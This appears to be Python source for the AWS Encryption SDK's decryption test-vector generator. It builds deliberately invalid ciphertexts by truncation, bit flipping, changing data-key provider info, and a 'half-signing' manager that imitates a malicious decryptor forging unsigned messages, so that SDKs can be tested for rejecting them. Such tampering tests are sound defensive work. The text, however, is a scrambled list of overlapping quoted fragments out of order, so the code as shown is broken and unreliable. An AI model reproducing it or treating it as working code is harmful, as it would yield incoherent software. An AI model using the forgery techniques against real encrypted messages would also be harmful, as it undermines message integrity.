"dictionary_validator, file_reader, file_writer, iterable_validator, membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import", ":rtype: dict \"\"\" return {name: os.urandom(size) for name, size in", "implied. See the License for the specific # language governing", "may not use this file except in compliance with the", "pairs. \"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM", "scenario, tampering with the input or the result. return: a", "BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index] ^= 1 << (BITS_PER_BYTE -", "half-signing materials by requesting signing materials from the wrapped default", "removing the signing key from teh result. \"\"\" if request.algorithm", "encryption context. THIS IS ONLY USED TO CREATE INVALID MESSAGES", "this scenario, writing the resulting ciphertext with ``ciphertext_writer`` and returning", "# # Licensed under the Apache License, Version 2.0 (the", "import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers import", "expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that modifies the", "from_file(cls, input_file): # type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load from a", "Callable, Dict, Iterable, Optional # noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types", "URI locating the written data :param str plaintext_uri: URI locating", "json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader", "type_name = \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) ->", "= TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\") decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec", "plaintext) for name, plaintext in self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\"))", ") @attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message Generation", "to indent JSON files (optional: default is to write minified)", "plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for name, scenario in", "of master key specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param", "decryption scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt)", "to attempt to forge an unsigned message from a decrypted", "return result def decrypt_materials(self, request): \"\"\"Thunks to the wrapped CMM\"\"\"", "Dict[str, bytes] \"\"\"Generate required plaintext values. :param dict plaintexts_specs: Mapping", "generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), ) for length", "range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the", ":param file input_file: File object for file containing JSON manifest", "changing the algorithm suite and removing the signing key from", "ENCODING from awses_test_vectors.internal.util import ( dictionary_validator, file_reader, file_writer, iterable_validator, membership_validator,", "the written data :param str plaintext_uri: URI locating the written", "== \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method tag: \"", "decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys, test_scenarios=test_scenarios ) root_writer(\"manifest.json\", json.dumps(decrypt_manifest.manifest_spec, indent=json_indent).encode(ENCODING))", "{name: os.urandom(size) for name, size in plaintexts_specs.items()} @classmethod def from_file(cls,", "= MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)", "the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod):", "for new_provider_info in self.new_provider_infos ] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario,", "without encryption permissions might do, to attempt to forge an", "BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates a", ") except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def", "raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests", "( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ),", "given bit in the given ciphertext\"\"\" byte_index, bit_index = divmod(bit,", "Scenario specification JSON :param KeysManifest keys: Loaded keys :param dict", "only actually need these imports when running the mypy checks", "zero).\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\"", "master key provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request):", "= MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None return cls( encryption_scenario=encryption_scenario,", "= os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer =", "then change the provider info on each EDK. \"\"\" result", "decryption_method: :param decryption_master_key_specs: Iterable of master key specifications :type decryption_master_key_specs:", "in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod def flip_bit(cls, ciphertext,", "encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs", "decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK", "scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys,", "required plaintext values. :param dict plaintexts_specs: Mapping of plaintext name", "master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM to avoid", "wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\" Create a new", "= encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if", "import IO, Callable, Dict, Iterable, Optional # noqa pylint: disable=unused-import", "of plaintext name to size in bytes :return: Mapping of", "an unsigned algorithm suite that includes the \"aws-crypto-public-key\" encryption context.", "a given new provider info value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod", "with ``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario` that describes the matching", "} decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys, test_scenarios=test_scenarios ) root_writer(\"manifest.json\", json.dumps(decrypt_manifest.manifest_spec,", "json_indent=None): # type: (str, Optional[int]) -> None \"\"\"Process all known", "Decryption Message Generation manifest handler. Described in AWS Crypto Tools", "HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items() if tampering_tag == \"change-edk-provider-info\": return", "Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.", "result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return result def decrypt_materials(self, request): \"\"\"Thunks", "length in range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that", "an unsigned message from a decrypted signed message, and therefore", "validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader =", ":param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method: Optional method used", "[ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM", "tampering_tag == \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method tag:", "= attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\"", "except ImportError: from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite from awses_test_vectors.manifests.master_key", "\"\"\" materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if", "MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts)", "changes the provider info on all EDKs.\"\"\" # pylint: disable=R0201", "field on EDKS. THIS IS ONLY USED TO CREATE INVALID", "plaintext names to plaintext values :return: Loaded test scenario :rtype:", "a public key\" ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ]", "important case for ESDKs to reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))", "decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run this", "def get_encryption_materials(self, request): \"\"\" Request materials from the wrapped CMM,", "from_tampering_spec(cls, spec): \"\"\"Load from a tampering specification\"\"\" if spec is", "tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer, plaintext_uri):", "writing the resulting ciphertext with ``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario`", "to plaintext values :param dict tests: Mapping of test scenario", "EDKs.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\"", "a full message encrypt manifest. :param file input_file: File object", "containing a full message encrypt manifest. :param file input_file: File", "in the \"license\" file accompanying this file. This file is", "tampering specification\"\"\" if spec is None: return TamperingMethod() if spec", "size in plaintexts_specs.items()} @classmethod def from_file(cls, input_file): # type: (IO)", "# language governing permissions and limitations under the License. \"\"\"", "to randomly generated bytes :rtype: dict \"\"\" return {name: os.urandom(size)", "key every time. cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider,", "awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers", "new_provider_info ) for new_provider_info in self.new_provider_infos ] def run_scenario_with_new_provider_info( self,", ":rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer,", "(name, decryption scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name,", "\"\"\"Run with tampering for a specific new provider info value\"\"\"", "return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom", "names to plaintext values :param dict tests: Mapping of test", "signing key from teh result. \"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY:", "the ciphertext :type tampering_method: :class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs: Iterable", "Message Generation. :param int version: Version of this manifest :param", "str plaintext_uri: URI locating the written plaintext data for this", "1) return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that produces a", "at byte {}\".format(length)), ) for length in range(1, len(ciphertext_to_decrypt)) ]", "new_provider_info ): \"\"\"Run with tampering for a specific new provider", "class for all tampering methods.\"\"\" @classmethod def from_tampering_spec(cls, spec): \"\"\"Load", "disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a given", "key specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn:", "MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"],", "in self.new_provider_infos ] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info", "from a file containing a full message encrypt manifest. :param", "with the input or the result. return: a list of", "\"truncate\": return TruncateTamperingMethod() if spec == \"mutate\": return MutateTamperingMethod() if", "spaces to indent JSON files (optional: default is to write", "and removing the signing key from teh result. \"\"\" if", "if result_spec else None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs,", "feature #0006 AWS Encryption SDK Decrypt Message Generation. \"\"\" import", "import six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager", "(str, Optional[int]) -> None \"\"\"Process all known encrypt test scenarios", "= json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests =", "= MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError: continue return", "return {name: os.urandom(size) for name, size in plaintexts_specs.items()} @classmethod def", "info field on EDKS. THIS IS ONLY USED TO CREATE", "plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod):", "ciphertext_writer: Callable that will write the requested named ciphertext and", "byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index] ^=", "generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result", ":param int version: Version of this manifest :param KeysManifest keys:", "data :param str plaintext_uri: URI locating the written plaintext data", "except in compliance with the License. A copy of #", "file_reader, file_writer, iterable_validator, membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import (", "@attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message Generation manifest", "six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from", "files (optional: default is to write minified) \"\"\" root_dir =", "(ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair(", "len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider", "scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys,", "ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn,", "be used in production! It is imitating what a malicious", "or in the \"license\" file accompanying this file. This file", "or the result. return: a list of (ciphertext, result) pairs.", "Decrypt test scenario that describes the generated scenario :rtype: MessageDecryptionTestScenario", "test scenarios and write the resulting data and manifests to", "data and manifests to disk. :param str target_directory: Directory in", "for name, plaintext in self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios", "ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit", "locating the written data :param str plaintext_uri: URI locating the", "def from_values_spec(cls, values_spec): \"\"\"Load from a tampering parameters specification\"\"\" return", "the wrapped default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): #", "= scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None", "info value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod def from_values_spec(cls, values_spec): \"\"\"Load", "IS ONLY USED TO CREATE INVALID MESSAGES and should never", "\"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated", "bytes :return: Mapping of plaintext name to randomly generated bytes", "DefaultCryptoMaterialsManager based on the given master key provider. \"\"\" self.wrapped_default_cmm", "plaintexts: Mapping of plaintext names to plaintext values :param dict", "if spec is None: return TamperingMethod() if spec == \"truncate\":", "data key provider info: \" + new_provider_info ) return generation_scenario.decryption_test_scenario_pair(", "manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method: Optional", "permissions might do, to attempt to forge an unsigned message", "file_writer, iterable_validator, membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod,", "decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run", "ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key", "= str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario(", "ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), )", "root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name:", "suite that includes the \"aws-crypto-public-key\" encryption context. THIS IS ONLY", "class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info on", "len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod def flip_bit(cls, ciphertext, bit): \"\"\"Flip", "result. \"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm", "iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario", "== \"truncate\": return TruncateTamperingMethod() if spec == \"mutate\": return MutateTamperingMethod()", "scenario: Scenario specification JSON :param KeysManifest keys: Loaded keys :param", "iterable_validator, membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest,", "generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def", "manifest. :param file input_file: File object for file containing JSON", "plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name =", "generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM to avoid generating a", "includes the \"aws-crypto-public-key\" encryption context. THIS IS ONLY USED TO", "decrypted signed message, and therefore this is an important case", ":param callable ciphertext_writer: Callable that will write the requested named", "= DecryptionMethod(decryption_method_spec) if decryption_method_spec else None if \"decryption-master-keys\" in scenario:", "a new instance for a given new provider info value.\"\"\"", "default is to write minified) \"\"\" root_dir = os.path.abspath(target_directory) root_writer", "dict plaintexts: Mapping of plaintext names to plaintext values :return:", "Decrypt Message Generation. \"\"\" import json import os import uuid", "in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else: decryption_master_key_specs", "def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a given scenario,", "result.algorithm = request.algorithm result.signing_key = None return result raise NotImplementedError(", "using a data key with a public key\" ) return", "materials_manager, new_provider_info ): \"\"\"Run with tampering for a specific new", "in production! \"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def", "Custom CMM that modifies the provider info field on EDKS.", "return [ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm, new_provider_info ) for new_provider_info", "that wraps a new DefaultCryptoMaterialsManager based on the given master", "file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"])", "specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario,", "a tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def", "new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager, new_provider_info): \"\"\"Create a new", "OR CONDITIONS OF # ANY KIND, either express or implied.", "continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self, target_directory, json_indent=None):", "\"\"\"Load from a file containing a full message encrypt manifest.", "all tampering methods.\"\"\" @classmethod def from_tampering_spec(cls, spec): \"\"\"Load from a", "CMM that wraps a new DefaultCryptoMaterialsManager based on the given", "change the provider info on each EDK. \"\"\" result =", "= (2,) class TamperingMethod: \"\"\"Base class for all tampering methods.\"\"\"", "key provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\"", "that includes the \"aws-crypto-public-key\" encryption context. THIS IS ONLY USED", "= file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name: plaintext_writer(name, plaintext) for name,", "generation_scenario, caching_cmm, new_provider_info ) for new_provider_info in self.new_provider_infos ] def", "= attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn", "= attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator))", "disk. :param str target_directory: Directory in which to write all", "decrypt test scenario. Handles serialization and deserialization to and from", "int version: Version of this manifest :param KeysManifest keys: Loaded", "\"\"\"Load from a tampering specification\"\"\" if spec is None: return", "awses_test_vectors.internal.mypy_types import ( # noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, )", "and write the resulting data and manifests to disk. :param", "distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS", "tampering_method: :class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs: Iterable of master key", "KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers", "bytes :rtype: dict \"\"\" return {name: os.urandom(size) for name, size", ") from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, )", "and deserialization to and from manifest specs. :param MessageEncryptionTestScenario encryption_scenario:", "MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest", "2.0 (the \"License\"). You # may not use this file", "possible bit.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):", "\"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod)))", "ciphertext and return a URI locating the written data :param", "\"\"\"Run this scenario, writing the resulting ciphertext with ``ciphertext_writer`` and", "never be used in production! It is imitating what a", "A copy of # the License is located at #", "in plaintexts_specs.items()} @classmethod def from_file(cls, input_file): # type: (IO) ->", "disable=unused-import from awses_test_vectors.internal.mypy_types import ( # noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC,", "MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method: Optional method used to", "wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering", ":rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys,", "return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that produces a message", "will write the requested named ciphertext and return a URI", "result. return: a list of (ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt", "method that changes the provider info on all EDKs.\"\"\" #", "data for this scenario :return: Decrypt test scenario that describes", "except ImportError: # pragma: no cover # We only actually", "self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes \"\"\"Data class for", "Decrypt Message Generation manifest handler. Described in AWS Crypto Tools", "), ) @attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message", "Optional # noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import ( #", "what a malicious decryptor without encryption permissions might do, to", "the \"aws-crypto-public-key\" encryption context. THIS IS ONLY USED TO CREATE", "\" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def decrypt_materials(self, request): \"\"\"Thunks to", "generation_scenario, plaintext_uri): \"\"\" Run a given scenario, tampering with the", "message from a decrypted signed message, and therefore this is", "Decrypt Message Generation. :param int version: Version of this manifest", "return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method tag: \" + tampering_tag)", "wraps a new DefaultCryptoMaterialsManager based on the given master key", "\"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result):", "input or the result. return: a list of (ciphertext, result)", "to :class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts", "materials for an unsigned algorithm suite that includes the \"aws-crypto-public-key\"", "for this scenario :return: Decrypt test scenario that describes the", "a new CMM that wraps a new DefaultCryptoMaterialsManager based on", "\"\"\" Run a given scenario, tampering with the input or", "\" + tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario,", "supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def decrypt_materials(self,", "file except in compliance with the License. A copy of", "result. return: a list of (ciphertext, result) pairs \"\"\" materials_manager", "materials by requesting signing materials from the wrapped default CMM,", "feature #0006 AWS Encryption SDK Decrypt Message Generation. :param int", "plaintexts_specs: Mapping of plaintext name to size in bytes :return:", "= attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager, new_provider_info): \"\"\"Create a new CMM", "EDKs.\"\"\" new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types)) def __init__(self, new_provider_infos): \"\"\"Create a", "the input or the result. return: a list of (ciphertext,", "\"\"\"Tampering method that changes the provider info on all EDKs.\"\"\"", "generation_scenario, _plaintext_uri): \"\"\" Run a given scenario, tampering with the", "single bit flipped, for every possible bit.\"\"\" # pylint: disable=R0201", "Create a new CMM that wraps a new DefaultCryptoMaterialsManager based", "spec == \"mutate\": return MutateTamperingMethod() if spec == \"half-sign\": return", "the License for the specific # language governing permissions and", "dict plaintexts: Mapping of plaintext names to plaintext values :param", "noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import ( # noqa pylint:", "TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates a good message at every", "target_directory: Directory in which to write all output :param int", "by requesting signing materials from the wrapped default CMM, and", "decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param result: \"\"\"", "[ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, 